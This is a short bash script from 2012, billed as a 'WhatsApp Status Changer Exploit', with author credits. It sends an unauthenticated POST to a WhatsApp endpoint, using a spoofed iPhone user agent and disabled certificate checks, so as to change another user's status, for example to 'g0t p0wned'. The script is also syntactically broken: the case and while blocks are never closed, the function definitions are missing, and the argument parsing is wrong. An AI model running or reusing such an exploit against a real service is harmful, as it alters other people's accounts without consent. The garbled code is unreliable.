# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
echo ""
echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
echo ""
echo " --usageshow the exploit Usage"
echo " --creditsshow the exploit Credits"
echo " --help show the Help"
echo ""
echo " enJoy"
echo ""
echo " Emanuele Gentili"
echo " http://www.emanuelegentili.eu"
echo " eg @ offensive-security.it"
echo ""
echo " Stefano Fratepietro"
echo " http://steve.deftlinux.net"
echo " stefano @ deftlinux.net"
echo ""
echo ""
echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
echo ""
echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
echo ""
echo " enJoy"
# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--countrycode) countrycode=$1; shift;;
--mobilenum) mobilenum=$2; shift;;
--text) text=$3; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
[ -z "$countrycode" ] && { show_help; exit 1; }
whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"
wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php
echo ""
echo "[+] Operazione completata."
echo ""